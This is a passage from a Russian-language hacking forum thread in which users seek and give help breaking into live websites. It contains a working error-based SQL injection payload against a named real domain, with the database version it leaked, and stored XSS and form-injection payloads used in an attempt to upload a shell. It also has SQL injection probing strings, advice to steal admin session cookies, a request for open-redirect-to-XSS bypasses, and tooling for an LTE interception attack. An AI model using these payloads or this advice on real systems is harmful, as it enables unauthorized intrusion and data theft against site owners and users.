Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    663
    Likes Received:
    1,421
    Reputations:
    441
    Apache or Nginx?

    Версия довольна старая. Если есть маломальский доступ внутрь, то вариантов должна быть куча. Из проверенного старья, можно что-то посмотреть здесь https://rdot.org/forum/showthread.php?t=286


    Думаю, что ничего интересного.
     
    fandor9 and Suicide like this.
  2. eminlayer7788

    eminlayer7788 Member

    Joined:
    31 Jul 2015
    Messages:
    111
    Likes Received:
    17
    Reputations:
    1
    Apache
     
  3. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    663
    Likes Received:
    1,421
    Reputations:
    441
    This exploit can be modified, but requires low level skills. Unfortunately, I haven't seen any simple bypasses.
     
    eminlayer7788 and fandor9 like this.
  4. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    1,305
    Likes Received:
    361
    Reputations:
    234
    помогите раскрутить
    Code:
    https://www.egtexpress.com/ru/country/slovinsko"/
     
  5. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,770
    Likes Received:
    881
    Reputations:
    859
    Code:
    /ru/country/slovinsko"and(extractvalue(1,concat(0x3a,(select@@version))))="1/
    Code:
    XPATH syntax error: ':10.0.35-MariaDB
     
    _________________________
  6. dread3nergy

    dread3nergy New Member

    Joined:
    23 May 2022
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Здравствуйте , я тут недавно , по этому если обращаюсь не в ту тему , прошу не кидать ссаны тряпками , а вросто отправить на поиски в нужном направлении.
    Поиск по форуму моего вопроса показал мне пустую страницу , по этому задам вопрос тут.

    Подскажите пожалуйста , где можно на русском языке найти информацию по IMP4GT ?
    Само собой интересует не статьи о том насколько это страшно, а реальная информация , прежде всего какой необходим инструментарий для реализации. Если информации на великомогучем нет , подойдут и буржуйские источники.
    Заранее спасибо.
     
  7. fandor9

    fandor9 Reservists Of Antichat

    Joined:
    16 Nov 2018
    Messages:
    620
    Likes Received:
    1,053
    Reputations:
    47
    Ну на сайте стоит что использовался стек srsLTE, ну и к тому же понадобится как минимум SDR который работает на частотах LTE (например limeSDR), хотя конкретно они использовали 2х Ettus USRP B210 (глава V.Setup)
     
    BigBear and 174region174 like this.
  8. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    663
    Likes Received:
    1,421
    Reputations:
    441
    nope
     
    eminlayer7788 likes this.
  9. signlog

    signlog New Member

    Joined:
    10 Jun 2022
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Всем привет, я только начинающий и тема вся эта интересна не в корыстных целях. Буду признателен за помощь.

    Нашёл уязвимость на сайте своего друга, следующего вида:
    Code:
    Text' -->">'>'"
    Данную уязвимость нашел в профиле, т.е. сделал вход в аккаунт-> перешел в редактировать профиль и в любой их строг, будь то логин, город, имя - вводиться данные строки.

    На выходе получаю:
    [​IMG]

    Далее начал развивать тему загрузки шелла, подгрузил кнопку загрузки:
    Code:
    New York' -->"><form method="POST" action="https://sitefriends" enctype="multipart/form-data" >
    <input type="file" name="Filedata"></center><br>
    <input type="submit" name="Submit" value="Upload">
    </form>'>'"
    Выбираю файл, нажимаю Upload (загрузка файла, в не зависимости какой, хоть картинку), форма загрузки пропадает и все, далее ничего нет. загрузился ли файл не известно, по пути пытался пройти не нашел.

    Куда копать и возможно ли как то по другому загрузить шелл или получить данные базы данных.
     
  10. eminlayer7788

    eminlayer7788 Member

    Joined:
    31 Jul 2015
    Messages:
    111
    Likes Received:
    17
    Reputations:
    1
    Hi
    See what the status code in response with burp suite
     
  11. b3

    b3 Moderator

    Joined:
    5 Dec 2004
    Messages:
    2,041
    Likes Received:
    933
    Reputations:
    199

    одной формы загрузки мало, у формы должен быть загрузчик, ты указал в поле action адрес, выходит логика такая что твоя форма отсылает на "морду" файл, но если в исходнике нет обработчика то ничего не произойдет. Судя по всему там хранимая XSS которую можно подсунуть админу и попробовать украсть куки авторизации и попасть в админку, либо сменить вектор атаки и попробовать найти в данных полях формы SQL INJ
     
    _________________________
    crlf likes this.
  12. FireRidlle

    FireRidlle New Member

    Joined:
    7 Jul 2009
    Messages:
    24
    Likes Received:
    1
    Reputations:
    3
    есть уязвимый параметр в body payload для post запроса, но не могу понять как использовать union select. при ошибки синтаксиса, я ее не вижу, но в таком случае возвращается пустая страница

    возвращает полностью все с таблицы
    Code:
    month=8&year=2022 or 1=1  -- - 
    возвращает пустую страницу => ошибка
    Code:
    month=8&year=2022 order by 2  -- - 

    возвращает разметку. значит в запросе 1 колонка
    Code:
    month=8&year=2022 order by 1  -- - 

    пытаюсь сделать union based атаку. пустая страница => ошибка
    Code:
    month=8&year=2022 union select 1 -- - 
    поле которое есть в основном запросе это id, потому что такой запрос проходит
    Code:
    month=8&year=2022 order by id -- - 
    скорей всего это подзапрос, или результат передается в другой

    используя технику с сравнением ascii могу достать данные, но это очень долго. есть возможность как то внедрить union select?
     
    #2972 FireRidlle, 15 Aug 2022
    Last edited: 15 Aug 2022
  13. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    438
    Likes Received:
    350
    Reputations:
    5
    sqlmap
     
  14. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    663
    Likes Received:
    1,421
    Reputations:
    441
    Годы идут, а вопросы всё теже :( /threads/424557/page-142#post-4388089
     
  15. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    501
    Likes Received:
    95
    Reputations:
    24
    Есть Open Redirect там же xss

    site.com/login?next=asdfg

    в ответ получаю

    Location: asdfg

    <p>Found. Redirecting to <a href="asdfg">asdfg</a></p>

    Принимает javascript:alert() но Location все портит, нужно этот Redirect сломать что бы все сработало.
    Пробовал варианты из таблицы https://habr.com/ru/company/pt/blog/247709/ но редирект даже если не происходит ответ мне не показывает.
    Есть что то актуальное?